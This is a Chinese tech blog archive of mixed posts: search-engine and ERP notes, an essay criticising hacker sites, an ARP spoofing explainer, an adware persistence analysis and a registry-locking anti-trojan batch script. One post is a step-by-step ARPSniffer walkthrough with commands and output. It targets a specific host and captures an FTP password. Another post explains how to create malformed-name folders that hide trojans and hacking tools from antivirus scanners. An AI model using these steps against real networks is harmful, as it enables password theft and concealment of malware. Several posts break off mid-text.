分类 : 网站技术 | 发表时间 06-07-2010
这一张图,对于喜欢seo或者不喜欢seo,有兴趣了解搜索引擎工作原理,或者没有兴趣的,仔细看看,都有助于理解,搜索引擎是如何工作的?它是如何帮助你找到你感兴趣的内容的?就像我们应用操作系统一样,如果熟悉了操作系统的工作原理,那么维护起操作系统,自然就事半功倍。
这张图片,详细解释了网页从被Google的网络蜘蛛爬取、收录、索引,最后再到用户进行一次Google搜索并产生搜索结果的过程,图中还描述了Google Adwords在搜索中产生的过程。 图片简洁明了,对了解Google搜索非常的直观,下面就是编译成中文Google如何完成一次用户搜索的图片:
google搜索引擎工作原理
分类 : 网络日志 | 发表时间 25-07-2008
这几天在做一个中型发展型企业的ERP项目。
这个企业的发展,比较有代表性,夫妻型的搭配,通过市场机遇,在半年到一年的时间,聚敛了千亿的财富,并且把连锁店开到了全省,手中拿了三个全国顶级行业品牌的省级独家代理权,市场好、销售好、产品好,供不应求,可以说,已经到了“坐地收钱”的阶段了,事实也是如此,有多少产品,都会在很短时间内消化掉,并且还有大量的订金现金流在手中;形势如此大好,好在老总确实够冷静,并没有因此而被如此利好的情况冲昏大脑,反而自己深入底层业务,把握各项细节,最好得出的结论是:需要管理思想及配套的管理软件来介入规划现在的业务,因此现在的管理方法和流程已经陷入了一个怪圈,如此走下去,不是被市场挤垮,而是被自己的内部业务给拖垮;接触我们公司后,由我们的调研分析,近日决定具体定制实施ERP系统。
前天是盘库上线时间,效果还算不错,库存在公司上下全体员工的仔细配合下,准确率达到80%以上,不要觉得这不够准确,对于一个从来不看仓库库存卖货的企业来说,这样的准确率已经是很难得了,并且在盘库中接触到各商品线老总、各业务流程相关负责人,从他们的话语中,还是非常迫切希望规整业务流程、上线软件来解决现在的业务瓶颈的。这对于实施过程来说,这是一个非常有利的因素,业界常说,实施ERP项目是“一把手工程”,从侧面说明了,实施新的业务流程的难度之大。在具体业务的规整中,各业务环节的人员的意识还是不错的,并且企业方提供的支持人员当中,很多是工作三年以上的老员工,对企业产品、现在业务流程及存在问题,都非常了解,并且对新的业务流程概念接触理解也很快,这都是非常利好的因素,很有利于新的业务流程得到贯彻,也有利于新的管理软件实施,但尽管如此,还是存在一些很不利的因素,这些因素,极大的阻碍了实施的效果和效率。
一、一把手尽管不可能实在的“身先士卒”,但也要指定代言人来管理,并且此代言人要能够一人之下,万人之上,当然,和软件方接触也要足够配合;事实是,作为这个代言的常务副总,连一个行政总监都指挥不了,造成实施过程中人员调配、基础硬件准备都不能满足实际需要,很被动;和软件方接触,因此也就缺乏承诺的准确性,这就造成了很大的工作成效不明显;
二、以前业务大量拖沓;之前有大量的订单业务,由于行业的特殊性,甚至存在三年以上的订单,此类订单大部分客户已经不再需要,因此需要抽出专门的人员对此类订单进行清理,而事实是:这方面的专门人员需要处理日常的销售业务,不能很即时的处理这些遗留业务,这在以往业务中已经是一个恶性循环,在此更是体现了出来;由于第一方面的不利因素,更是造成了这方面工作的低成效。因此,需要大刀阔斧处理历史遗留业务,回访以往订单,并结合库存管理来使库存和销售业务达到协调一致;在此过程中,各业务人员,尽快熟悉新的业务流程和软件操作。
这两方面因素现在彰显得比较突出,具体的由于时间原因,今天不再过多赘述,稍后项目结束,再继续总结。
搞好一个项目不容易,非常实际的,团队协作的结果。
呵,最后说句比较俗的题外话:挣钱不容易啊,熬夜,熬坏了!
分类 : 系统安全 | 发表时间 08-02-2007
假设想攻击的主机IP是:61.139.1.79 ,同一子网下我们已有权限的主机IP是:61.139.1.88并可以3389登陆
第一步:
tracert 61.139.1.1
C:\WIN2000\system32>tracert 61.139.1.1
tracing route to HACK-4FJ7EARC [61.139.1.1]
over a maximum of 30 hops:
1 <10 ms <10 ms <10 ms HACK-4FJ7EARC [61.139.1.1]
Trace complete.
这就说明了你想攻击的主机和你所在的主机在一个关网中那么就有可能
进行ARPSNIFFER了
第二步:看本机IP设置和网卡情况
C:\WIN2000\system32>ipconfig /all
Windows 2000 IP Configuration
Host Name . . . . . . . . . . . . : smscomputer
Primary DNS Suffix . . . . . . . :
Node Type . . . . . . . . . . . . : Broadcast
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
Ethernet adapter Intel Fast Ethernet LAN Controller – onboard:
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Intel(R) 8255x Based Network Connection
Physical Address. . . . . . . . . : 00-B0-D0-22-10-C6
DHCP Enabled. . . . . . . . . . . : No
IP Address. . . . . . . . . . . . : 61.139.1.2
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 61.139.1.65
DNS Servers . . . . . . . . . . . : 61.139.1.73
说明只有一块网卡那么在执行ARPSNIFFER的时候就可以不要第五个参数了这个地
方小榕的主页可没有说哟,经过测试我发觉如果只有一块网卡你第五个参数使用0
的话也只能嗅探到通过自已的数据哟.
从上面我们还可以知道网关是61.139.1.65
第三步:查看本机时间
C:\WIN2000\system32>net time \\127.0.0.1
\\127.0.0.1 的当前时间是 2003/1/28 下午 09:13
命令完成成功
要注意的是这儿的时间是12小时式,用at命令应要24小时式
第四步:编写启动ARPsniffer的bat文件
C:\WIN2000\system32>echo arpsniffer 61.139.1.65 61.139.1.79 21 1.txt /reset>c:\winnt\a.bat
注意咯我们没有要第五个参数,如果有多个网卡的话你就要先直接执行arpsniffer显示如下:
ARPSniffer 0.5 (Router Inside), by netXeyes, Special Thanks BB
www.netXeyes.com 2002, security@vip.sina.com
Network Adapter 0: D-Link DE-528 Ethernet PCI Adapter
Network Adapter 1: Intel(R) PRO/100+ PCI Adapter(这个地方选第五个参数)
Usage: ArpSniffer [/RESET]
第五步:后台运行开始嗅探咯
C:\winnt\system32>at \\127.0.0.1 20:44 c:\winnt\a.bat
注意:这儿的时间要用24小时式
arpsniffer最好拷到system32目录下,记录文件也会生成在这儿
执行完第四步要先安装WINPCAP 2.1驱动
同时arpsniffer要使用最新的0.5版,老版本有不少BUG而且要改注册表重启机子
第六步:看密码但是生成的记录文件不能直接看也不能拷贝所以我们只能先结束掉
以SYSTEM权限启动的ARPSniffer程序
C:\winnt\system32>pulist
……………….
conime.exe 248 NT AUTHORITY\SYSTEM
explorer.exe 1864 SMSCOMPUTER\Administrator
CSRSS.EXE 2256 NT AUTHORITY\SYSTEM
Arpsniffer.exe 2322 NT AUTHORITY\SYSTEM —-就是它了!
WINLOGON.EXE 2344 NT AUTHORITY\SYSTEM
………………….
杀了它
C:\winnt\system32>pskill 2322
PsKill v1.03 – local and remote process killer
Copyright (C) 2000 Mark Russinovich
http://www.sysinternals.com
Process 2322 killed.
C:\winnt\system32>type 1.txt 我的例子中嗅探的是FTP密码:)
……………
61.188.218.179(1404)->61.139.1.79(21)PASS aaabbb
61.139.1.79(21)->61.188.218.179(1404)530 User czy82 cannot log in.
61.139.1.79(21)->61.188.218.179(1404)530 User czy82 cannot log in.
61.188.218.179(1404)->61.139.1.79(21)QUIT
61.188.218.179(1404)->61.139.1.79(21)QUIT
61.139.1.79(21)->61.188.218.179(1404)221
61.139.1.79(21)->61.188.218.179(1404)221
…………
…………
特别要注意的就是PASS哈:)
—————————————————-
付录:
前台正常执行的显示
C:\>arpsniffer 61.139.1.65 61.139.1.79 21 1.txt /reset
ARPSniffer 0.5 (Router Inside), by netXeyes, Special Thanks BB
www.netXeyes.com 2002, security@vip.sina.com
Network Adapter 0: Intel(R) 8255x Based Network Connection
Enable IP Router….OK
Get 61.139.1.65 Hardware Address: 00-00-0c-07-ac-02
Get 61.139.1.79 Hardware Address: 00-b0-d0-22-10-cb
Get 61.139.1.88 Hardware Address: 00-b0-d0-22-10-c6
Spoof 61.139.1.79: Mac of 61.139.1.65 ===> Mac of 61.139.1.88
Spoof 61.139.1.65: Mac of 61.139.1.79 ===> Mac of 61.139.1.88
有时这儿要先显示can not open driver(0)不管它等一下就可以了
来源:C.N.H
本文是一篇安全技术顾问的手记,并没有发表过,文中所谈到的是整个黑客、红客及安全技术联盟存在的问题, 因为小榕在这当中的特殊地位,所以本文以小榕为一个评论点。然而,作者真正想让读者关心的是在文中谈及事件所说明的问题,而不是要激起读者对小榕个人的不 满,所以本文绝对不是对小榕个人攻击的文章,而是一篇希望激起大家对中国网络安全深思的文章!
Internet从它在中国出现的那一刻算起到 今天已有十几年的历史了,在这期间,IT产业从萌发到飞速发展再到今天一片萧条几乎破产,可谓饱经风霜了。而在网络世界里的另一批人也可谓几经变革,他们 的名字叫做“黑客”。这个名字最早丝毫没有贬义的意思,它是指那些对网络有相当了解的计算机技术人才,他们可以在必要的时候从别人的系统中得到自己想要的 东西,这与今天的恶意攻击者完全不同,可是在中国也不知道是怎么的渐渐的黑客就与恶意攻击者画了等号。
言归正传,无论是夕日的“绿色兵团”还 是今天的“红客联盟”。一说到小榕的名字,可谓无人不知,无人不晓。小榕无疑已经成为中国黑客或是红客界的代表人物之一。几年来,小榕也算是得到了不少的 鲜花和掌声。支持者之多只要看看小榕的个人网站的浏览量就知道了。可是,有谁真正静下心来,仔细想过小榕都做了些什么呢?他做的事真的如红客们说的那样是 一起在为中国的网络安全而努力吗?也许你想过,也许你没有,但是无论怎样,请先听听我个人的一点愚见。小榕等一类人,他们在现实中在做什么,我并不了解, 可能也是安全顾问之类。然而,他们在网络上在做什么,我是看见的。如果小榕他们真的是在为网络安全而努力,那么他的个人网站就应该是一个有利于培养网络安 全工程师的网站,只有当中国有更多的网络安全工程师的时候,中国的网络才可以谈安全,而不是更多的黑客。
那么作为一个真正的安全技术网站应该做到什么呢?来看看专业的安全人士是怎么说的:
①、 网站上必须有网络安全教程的下载及一些发现被攻击时的具体解决方案;
②、 详细介绍防火墙的原理及实现;
③、 给出安全软件的编写策略及原码(可以是部分);
④、 即使给出一些攻击性软件,也应该指出是用于安全漏洞测试的,最重要的是应该同时具体的攻击原理,最好同时有防卫方案及防卫原理介绍,而且对防卫软件的介绍应该更加的具体。
以 上四点才是一个网络安全网站应该做的。但是,小榕的个人网站做到了多少呢?人们在他的网站上看见的是大量最新最好的攻击性软件及使用方法介绍供人下载,并 且指出是菜鸟一看就懂,立刻上手,但是却丝毫不给出防御的措施,就算不给,给出攻击原理也好啊,至少敏感的网络安全人士会立刻给出解决方案,这样可以缩短 安全软件的开发周期。但是这也极少看见,或是无关痛痒的略点一二。根本是对网络安全不负责任。唯一看上去好象算负责的就是那句“劝告大家不要用本网站提供 的软件攻击他人”,但是这样的话有什么用呢?有时反而更容易激起人们的兴趣。至于提供安全教程下载要么根本没有要么就是名字这样叫内容还是攻击教程,这一 点我不说,网民应该可以感觉到的。当然有时到是可以看见安全防卫软件的下载,也是十分陈旧的。就好象武器店卖的是雪亮崭新的矛却卖锈迹斑斑的盾。
这 样造成的后果是什么呢?“盾”老化了的已经不能用了,安于防守,必然一败涂地,结果是所有的人一涌而上,打着“维护中国网络安全”的大旗,在网络上展开拼 杀,并自称是变被动为主动,以攻击代替防守,而自己的防御系统没有什么改进,一旦中拳也是很痛的,这就象小孩子打架,结果使得网络上一旦展开黑客大战往往 两败俱伤,谁赢只是看谁先攻击罢了,可悲,可叹啊!但是作为网络工程师希望造成的不是这样的氛围。我们希望网络上到处都是身着铠甲,一手持盾,一手拿矛的 甲士。在受攻击时可以做到足够的防卫,并给对方警告,在对方顽固不化时,才用矛给予教训,而在任何情况下不主动攻击他人,这才是仁者之风,才是网络应有的 气氛,要有这样的气氛,网络可供下载的应该是最好的盾和必要的矛,不是现在这样的。
现在再来看看所谓的网络安全论坛,有很多人认为这样的形式很好,大家可以交流经验,但是就靠这个是远远不够的,诚然现在的安全论坛分类详细,条目繁多,但是它的缺点也是很多的。这里说最大的三点:
首先,论坛即使提到安全问题,也是零零星星的,很难系统化,自然对安全意识的推广十分不利,而且问题提出了,回答也是少有着边际的,即使很有水平的人,回答的正确的也只是告诉你去装什么软件,少有谈及理论之人,也许是自己用来吃饭的技术不便传人吧;
其次,论坛上灌水之人众多,真正懂技术的人太少了,很多人只是在某某电脑杂志上看见有关黑客的文章就上传,甚至随便抓一篇就是,可能是连自己也看不懂的文章。上传只是为了多骗些经验值,让更多的菜鸟崇拜自己,这样的文章往往没有什么价值,反而浪费很多人的时间去看;
再次,就是网管自己管理不到位,很多过期的毫无价值的东西,可以删的就删了它,这样以避免长期积累一个论坛多达数十上百页,新来的人不知道看什么。
当 然这样还有一个问题,什么是没有价值的东西?这一点很多网管往往误解我们的意思,他们会认为在网上放了半年或是一年的东西,很多人看过了,就没有价值了, 就可以删了,这样往往造成想“CEO是什么?”,“ISDN是什么?”,“ADSL是什么?”等等这些对初学者是永远有用的,而且是新手们特别想问的问 题,而要新手们每次都问一边这样的问题无疑那些自以为是老鸟的人又会笑他们无知,这样使得新手的入门变的比提高更难,所以对于这样的问题就应该一直在网络 上。
上面说的种种问题,归一下就是象小榕这样有关安全技术的网站,应该提供的知识(网络安全知识)没有提供,甚至是提供了相反的知识(黑客攻 击知识)。已经提供的服务(安全技术论坛)又办的十分糟糕。结果使人们想在网络上找到有关网络安全的知识来保护自己变的很困难,往往最多是在受攻击后在求 救,还不一定有救。而这样的网络提供的服务却使那些对网络略知一二的人很容易找到攻击别人的方法,软件及实例。可谓全套服务。这样就培养了一大批恶意的攻 击者,给网络增加了危险,给国家带来了损失。同样的问题不只在小榕网站,红客联盟中国网络安全技术联盟也一样。有时甚至提供攻击教程的下载。根本就成为一 个培养黑客的网站。
这些网站,他们都有共同的标语“为中国的网络安全而努力”,他们都说:“为了中国的主权,向老美发起攻击。”他们都以为自 己是一颗红心向着党,是爱国的。但是他们是否想过,他们在网络上教人的方式是否有错呢?他们教出的都是什么样的人?他们的行为是给中国带来
分类 : 技术文摘 | 发表时间 09-12-2006
自从安装了杀毒软件后,每次只要打开存有黑客工具的文件夹,就会频繁弹出报警窗口,一失手按下“确定”后,辛苦积攒的程序便“随风而逝”了。几次下来,我的“存粮”已几乎消失怠尽,看来需要想想办法,搞一个杀毒软件检测不到的文件夹才行。
一、原理简单 方法明确
众所周知,在Windows中“\”符号是路径的分隔符,比如“C:\Windows\”的意思是指C分区中的Windows文件夹,而 “C:\Windows\System.exe”的意思是C分区中的Windows文件夹中的System.exe文件。那么如果文件名中有“\”符号会怎么样呢?假如“S\”是一个文件夹的名字,这个文件夹位于“F:\”,它的路径就是“F:\S\”,当我们试图访问时,Windows会错误的认为我们要打开的文件是F分区下的名为“S”的文件夹,而非“s\”文件夹,这样Windows就无法准确打开该文件夹,并且会返回一个错误信息,因为以上路径并不存在。
二、建立目录 饶道而行
知道了原理,那么就在Windows XP下简单的创建“S\”文件夹吧。咦?怎么系统会提示“文件名不能包含‘\’符号”。看来微软早已想到这一点了,看来只好采取其它办法来创建这个“特殊”文件夹了。
在“运行”栏中执行“cmd”命令,打开命令提示符窗口,在其中输入“c:\”命令(不含引号,下同),接着在“c:\”后输入 “mkdir s..\”,按回车键。现在,打开资源管理器,可看到C盘下建立了一个名为“s.”的文件夹,不过这个文件夹既不能打开也不能删除。不能打开是因它的实际路径是“c:\s..\”(由于是我们自己创建的,所以可以确定它的实际路径),但在系统资源管理器中,它的文件夹名变成了“s.”,这样当试图打开它时,系统实际上尝试打开的是“c:\s.\”,这当然是不能打开的。由于系统认为该文件夹并不存在,所以会报错,不能删除也是基于此原因。
如果在c:\后键入mkdir s…\按回车键,在资源管理器中会看到名为“s..”的文件夹,而这个文件夹可以打开但无法删除。但实际上这个文件夹是无效的,在Windows XP下拷贝任意一个文件到这个文件夹,再打开时便会发现其中什么也没有。
然新建的“s..\”文件夹不能打开也不能删除,但它却不妨碍我们向其中拷贝文件。不过需要注意的是,一旦对这个文件夹进行了操作,便会在当前路径下多出一个名为“s”的文件夹,此时这两个文件夹便都可以正常打开了,但里面的内容均为空。这时只要删除其中任意一个文件夹,留下的文件夹便又无法在资源管理器中,进行正常的打开或删除操作了。
既然这样的文件夹在Windows下不会被删除,那么就大可放心的将黑客工具或重要文件保存其中了。经过测试,在其中即使存放木马甚至病毒程序,也不会被杀毒软件查杀到了。
虽然这类文件夹在资源管理器中不能正常打开,但可以通过“运行”栏进行开启,前提是知道该文件夹的真实路径。比如本例便可在“运行”栏中键入“c:\s..\”后,按回车键来打开这个文件夹。
三、删除操作 轻松自如
最后再来说说这类文件夹的删除方法。如果文件夹是空的,可在命令提示符窗口中输入“c:\”,然后再键入“rmdir s..\”命令,按回车执行后即可删除。如果文件夹中已存放了文件,则可键入“rmdir s..\/s”命令,按回车键后,提示“s..\, 是否确认(Y/N)?”时,键入“y”键删除该文件夹。
分类 : 系统安全 | 发表时间 03-11-2006
流氓软件的技术五花八门,任何一项功能都有可能成为流氓技术,就象武器,用好了可以伸张正义,用歪了却成为罪恶的帮凶。
首先我从win32下的一些流氓着数分析开始:
1.我想做为一个流氓软件,首先要做到的是实时运行,譬如在注册表的run下,在boot下增加它的启动。这应该是比较老的方法,以前 3721好象就是在run下,但是现在一般的人都知道了。
2.作为流氓软件,已经改变了以前一些木马的特性了,他没必要使自己一定要实时启动了,而是需要自己的时候再启动,譬如说打开一个浏览器窗口,这是一般流氓软件的方法,因为他需要连上网才能有利益可图,所以浏览器肯定是流氓软件必定监控的进程。
3.使用BHO插件,这种技术早先特别流行,这是微软提供的接口,本意是让IE浏览器可以扩充功能。每当一个ie浏览器启动的时候,都会调用BHO下必要的插件,流氓软件就是利用这一点。监控了浏览器所有事件与信息。
4.还有最笨的办法就是利用进程快照监控进程,判断有它自己所监控的进程启动,就使用atl得到浏览器指针,从而监控浏览器所有事件与信息。
5,还有一种方法就是使用spi,这是我在网上看到的。spi是分层协议,当winsock2启动的时候都会调用它的dll,可以监控所有应用层数据包。从而监控用户信息,而且能实时启动。
6.hook方法,hook技术可以所应用太广泛了,特别是监控方面。所以流氓软件也不会错过。首先应用的是api函数hook,譬如windows核心编程里的apihook类,或者微软的detous都可以完成,两者方法其实相同就是修改IDT函数入口地址。api hook钩住createprocess 就可以监控进程,比进程快照性能更强,可以钩住spi下的函数可以完成spi下的所有功能。还有消息hook,鼠标消息,键盘消息,日子消息等等钩子,方法实在太多,都可以利用。
上面列举了一些流氓软件的使用方法,但是流氓软件的一个特性是他无法卸载。所以它又要使用下面的方法了因为上面的很多方法都可以删除注册表卸载他们,那怎么办呢,那就会时时监控,它会在它的进程,或者线程里监控注册表项,设置一个循环监控,发现没了就继续安装,增加。我想这应该是很多流氓软件的技术。
那现在又出现了一个新问题,那就是流氓软件的进程线程要是结束掉怎么办呢???看下面
7.一种方法就是上面的api hook技术,钩住openprocess ,用自己的函数判断只要打开的是自己进程就返回正确,使用这种方法,用户或者一般的软件就无法结束它的进程了。
8.还有一种是上面象bho,spi根本没有进程。一般的用户也无法删除他
9.还有一种方法是远程线程,这个技术用的也很普遍,首先是象api hook一样向目标进程里申请一段内存空间,然后使用自己映射过去,然后使用CreateRemoteThread创建远程线程。一般很多流氓软件或者以前的一些木马程序,都是把线程注入到系统进程譬如explorer,service等等,使用用户或者一般的杀毒软件很难处理或者结束……
10.注册成服务后,也可以简单的隐藏进程。还有更可笑的是把自己的进程名跟一些系统进程名譬如lsass相同后,也就无法结束了。
从我上面列举的方法已经差不多可以形成好几款流氓软件了。但是你别高兴太早,因为这些技术只是应用层的,现在出现了一堆驱动层的反流氓软件工具,譬如超级兔子,完美卸载,木马克星,雅虎助手,还有现在火热的360安全卫士。
这些反流氓软件的方法删除以上流氓软件软件就比较简单。优先于流氓软件启动,截获所有访问流氓软件文件的irp,然后删除注册表项,删除文件。轻松的完成了反流氓任务。
为了针对这些反流氓软件,流氓软件出现了内核层的了。
1.首先是使用文件过滤驱动,保护自己的文件,流氓软件过滤了create里对于自己文件的所有fileopen外的所有irp和SetInformation下所有的irp,从而有效的保护了自己的文件。
2.内核级hook技术,可hook住所有公开的或者未公开的内核函数,譬如zwcreatefile,zwSetInformation,也可以有效的保护文件。
3.驱动层下的流氓软件还使用内核级hook技术,替换Regdeletekey,RegDeleteValueKey,RegSetValueKey从而有效的保护了注册表4.利用内核级hook技术还有隐藏进程,或者监控进程,重起进程。
对于上面的流氓软件的方法一些驱动层下的反流氓软件工具又有点束手无策了。因为同是驱动程序相互拦截irp等于大家都无法操作,反流氓软件工具的删除 irp会被拦截,或者删除函数会被替换。删除注册表函数会被替换。虽然驱动的加载有先后,但是无法保证能完全的删除流氓软件,从而出现了一些更顶级的反流氓软件,他直接发删除文件irp到文件系统。,删除注册表也直接发送到文件系统。这类流氓软件又能有效的完成了反流氓任务,但是根据我了解,这样的软件不多。现在火热的360安全卫士都还只是使用了笨办法,优先于驱动流氓软件启动,创建一个驱动流氓软件同设备名的设备,,使流氓驱动创建不成功。具我了解他优先于流氓驱动启动是把自己创建于PNP_TDI这个组下面,就是简单的ndis就能优先于360启动。如果前面的组,那360就束手无策了。所以对付这类流氓驱动只能用直接发irp到文件系统。
流氓软件又怎么来防止直接发irp到文件系统的反流氓软件呢?rootkit,我看很多对于rootkit有误解,很多都认为hook也是 rootkit.呵呵,rootkit说白了就是嵌入操作系统文件。你不是发irp到文件系统吗?,可是我把文件系统给改了,不过rootkit根据我的观察unix或者linex下比较多,在windows下还是比较少的,因为需要使用汇编了,哎太晚了,不写了,我想如果流氓软件做到这个技术程度,它也没必要做流氓了,直接做操作系统得了。
(中国安全信息网)
分类 : 系统安全 | 发表时间 19-10-2006
【故障原因】
局域网内有人使用ARP欺骗的木马程序(比如:传奇盗号的软件,某些传奇外挂中也被恶意加载了此程序。
【故障原理】
要了解故障原理,我们先来了解一下ARP协议。
在局域网中,通过ARP协议来完成IP地址转换为第二层物理地址(即MAC地址)的。ARP协议对网络安全具有重要的意义。通过伪造IP地址和MAC地址实现ARP欺骗,能够在网络中产生大量的ARP通信量使网络阻塞。
ARP协议是“Address Resolution Protocol”(地址解析协议)的缩写。在局域网中,网络中实际传输的是“帧”,帧里面是有目标主机的MAC地址的。在以太网中,一个主机要和另一个主机进行直接通信,必须要知道目标主机的MAC地址。但这个目标MAC地址是如何获得的呢?它就是通过地址解析协议获得的。所谓“地址解析”就是主机在发送帧前将目标IP地址转换成目标MAC地址的过程。ARP协议的基本功能就是通过目标设备的IP地址,查询目标设备的MAC地址,以保证通信的顺利进行。
每台安装有TCP/IP协议的电脑里都有一个ARP缓存表,表里的IP地址与MAC地址是一一对应的,如下表所示。
主机 IP地址 MAC地址
A 192.168.16.1 aa-aa-aa-aa-aa-aa
B 192.168.16.2 bb-bb-bb-bb-bb-bb
C 192.168.16.3 cc-cc-cc-cc-cc-cc
D 192.168.16.4 dd-dd-dd-dd-dd-dd
我们以主机A(192.168.16.1)向主机B(192.168.16.2)发送数据为例。当发送数据时,主机A会在自己的ARP缓存表中寻找是否有目标IP地址。如果找到了,也就知道了目标MAC地址,直接把目标MAC地址写入帧里面发送就可以了;如果在ARP缓存表中没有找到相对应的 IP地址,主机A就会在网络上发送一个广播,目标MAC地址是“FF.FF.FF.FF.FF.FF”,这表示向同一网段内的所有主机发出这样的询问: “192.168.16.2的MAC地址是什么?”网络上其他主机并不响应ARP询问,只有主机B接收到这个帧时,才向主机A做出这样的回应: “192.168.16.2的MAC地址是bb-bb-bb-bb-bb-bb”。这样,主机A就知道了主机B的MAC地址,它就可以向主机B发送信息了。同时它还更新了自己的ARP缓存表,下次再向主机B发送信息时,直接从ARP缓存表里查找就可以了。ARP缓存表采用了老化机制,在一段时间内如果表中的某一行没有使用,就会被删除,这样可以大大减少ARP缓存表的长度,加快查询速度。
从上面可以看出,ARP协议的基础就是信任局域网内所有的人,那么就很容易实现在以太网上的ARP欺骗。对目标A进行欺骗,A去Ping主机C 却发送到了DD-DD-DD-DD-DD-DD这个地址上。如果进行欺骗的时候,把C的MAC地址骗为DD-DD-DD-DD-DD-DD,于是A发送到 C上的数据包都变成发送给D的了。这不正好是D能够接收到A发送的数据包了么,嗅探成功。
A对这个变化一点都没有意识到,但是接下来的事情就让A产生了怀疑。因为A和C连接不上了。D对接收到A发送给C的数据包可没有转交给C。
做“man in the middle”,进行ARP重定向。打开D的IP转发功能,A发送过来的数据包,转发给C,好比一个路由器一样。不过,假如D发送ICMP重定向的话就中断了整个计划。
D直接进行整个包的修改转发,捕获到A发送给C的数据包,全部进行修改后再转发给C,而C接收到的数据包完全认为是从A发送来的。不过,C发送的数据包又直接传递给A,倘若再次进行对C的ARP欺骗。现在D就完全成为A与C的中间桥梁了,对于A和C之间的通讯就可以了如指掌了。
【故障现象】
当局域网内某台主机运行ARP欺骗的木马程序时,会欺骗局域网内所有主机和路由器,让所有上网的流量必须经过病毒主机。其他用户原来直接通过路由器上网现在转由通过病毒主机上网,切换的时候用户会断一次线。
切换到病毒主机上网后,如果用户已经登陆了传奇服务器,那么病毒主机就会经常伪造断线的假像,那么用户就得重新登录传奇服务器,这样病毒主机就可以盗号了。
由于ARP欺骗的木马程序发作的时候会发出大量的数据包导致局域网通讯拥塞以及其自身处理能力的限制,用户会感觉上网速度越来越慢。当ARP欺骗的木马程序停止运行时,用户会恢复从路由器上网,切换过程中用户会再断一次线。
【HiPER用户快速发现ARP
分类 : 系统安全 | 发表时间 15-06-2006
信息来源:http://gooo.77169.com/archives/2006/77592.html
一、问题的提出
大部分的木马及部分的病毒是通过注册表的自启动项或文件关联或通过系统服务实现自启动的,那是否有一种方法可以防止木马或病毒修改注册表项及增加服务呢?
二、问题的解决
windows2000/xp/2003的注册表是可以设置权限的,只是我们比较少用到。设置以下注册表键的权限:
1、设置注册表自启动项为everyone只读(Run、RunOnce、RunService),防止木马、病毒通过自启动项目启动
2、设置.txt、.com、.exe、.inf、.ini、.bat等等文件关联为everyone只读,防止木马、病毒通过文件关联启动
3、设置注册表HKLM/SYSTEM/CurrentControlSet/Services为everyone只读,防止木马、病毒以”服务”方式启动
注册表键的权限设置可以通过以下方式实现:
1、如果在域环境里,可能通过活动目录的组策略实现的
2、本地计算机的组策略来(命令行用secedit)
3、本文通过setacl这个程序加批处理实现,可以在http://www.helge.mynetcologne.de/setacl/下载
4、手工操作可以通过regedt32(windows2000系统,在菜单“安全”下的“权限”)或regedit(windows2003/xp,在“编辑”菜单下的“权限”)
批处理代码在后面给出。
如果只有users组权限,以上键值默认是只读的,就可以不用这么麻烦了。
三、适用人群
1)、对电脑不是很熟悉,不经常安装/卸载软件的人
2)、喜欢在网上下载软件安装的朋友
3)、每台电脑的操作人员都有管理员权限,这些人的电脑水平又参差不齐的企业
四、还存在的问题
1)、安装杀毒软件,打补丁的时候都可能对那些注册表进行操作,这样就得先恢复权限设置,再安装,安装完成后重新设置。不方便
2)、防不住3721,不知是不是3721的权限太高了(听说3721是通过驱动程序启动的,有ring 0级权限)
3)、只适合windows2000/xp/2003,其他的就没办法了
4)、只能对付那些简单的病毒和木马
五、其他
大家看完本文看,可能禁不住大骂:神经病,两三句话就说完的事,非得搞得像论文,写这么一大堆,浪费我时间。如果真的是这样,那真的是对不起了。只因为公司在实施ISO,我也觉得ISO里提倡的东西蛮好的,为了规范化我的文档,我就多做些练习了。
打包好的程序可以到:
https://www.xfocus.net/php/tools.php?sub=down&tid=741下载。
六、批处理源代码
@goto start
==============================================================
名称:反特洛伊木马
功能:
1、禁用自启动项目(run runonce runservices)
2、禁止修改.txt、.com、.exe、.inf、.ini、.bat等等文件关联
3、禁止修改”服务”信息
原理:设置注册表权限为只读
版本修订情况
版本号 修订日期 修订人 修订内容
1.0 2004-12-22 netu0 创建本脚本
==============================================================
:start
@SETLOCAL
@rem 活动代码页设为中文
@chcp 936>nul 2>nul
@echo.
@echo ************************************************************
@echo #
@echo # 欢迎使用反特洛伊木马程序
@echo #
@echo #
@echo ************************************************************
:chkOS
@echo.
@ver find “2000″ > nul 2>nul
@if “%ERRORLEVEL%”==”0″ goto :2000
@ver find “Microsoft Windows [版本 5" > nul 2>nul
@if "%ERRORLEVEL%"=="0" goto :2003
@ver find "XP" > nul 2>nul
@if "%ERRORLEVEL%"=="0" goto :XP
@echo.
@echo #您的操作系统不是Windows 2000/XP/2003中的一种,无法使用。
@goto quit
@rem 在下面语句插不同系统的不同命令
:2000
@set UpdatePolicy=secedit /refreshpolicy machine_policy>nul 2>nul
@goto Selection
:XP
@set UpdatePolicy=GPUpdate /Force>nul 2>nul
@goto Selection
:2003
@set UpdatePolicy=GPUpdate /Force>nul 2>nul
@goto Selection
:Selection
@rem User Choice
@echo.
@echo 请输入以下选项前面的数字
@echo.
@echo 1: 安装反特洛伊木马保护
@echo 2: 删除反特洛伊木马保护(恢复默认设置)
@echo 3: 查看技术信息
@echo 4: 退出
@echo.
@set /p UserSelection=输入您的选择(1、2、3、4)
@if "%UserSelection%"=="1" goto install
@if "%UserSelection%"=="2" goto uninstall
@if "%UserSelection%"=="3" goto information
@if "%UserSelection%"=="4" goto quit
@rem 输入其他字符
@cls
@goto Selection
:information
@cls
@echo
============================================================
@echo #
@echo # 欢迎使用反特洛伊木马程序
@echo #
@echo #功能:
@echo #
@echo # 1、设置注册表自启动项为只读(Run、RunOnce、RunService),
@echo # 防止木马、病毒通过自启动项目启动
@echo # 2、设置.txt、.com、.exe、.inf、.ini、.bat等等文件关联为只读,
@echo # 防止木马、病毒通过文件关联启动
@echo # 3、设置注册表HKLM/SYSTEM/CurrentControlSet/Services为只读
@echo # 防止木马、病毒以"服务"方式启动
@echo #
@echo #注意事项:
@echo # 某些安装程序也会用到以上注册表键,请在安装前运行本程序,
@echo # 然后选择2,恢复默认设置。安装完成后,重新运行本程序,
@echo # 然后选择1,实施反特洛伊木马保护
@echo ==============================================================
@echo.
@echo 按任意键,返回选择
@pause>nul 2>nul
@cls
@goto Selection
:install
@set OP=/grant everyone /read /p:no_dont_copy
@goto Doit
:uninstall
@set OP=/revoke everyone /read /p:yes
@goto Doit
oit
@echo.
@echo 正在执行操作...
@rem HKLM
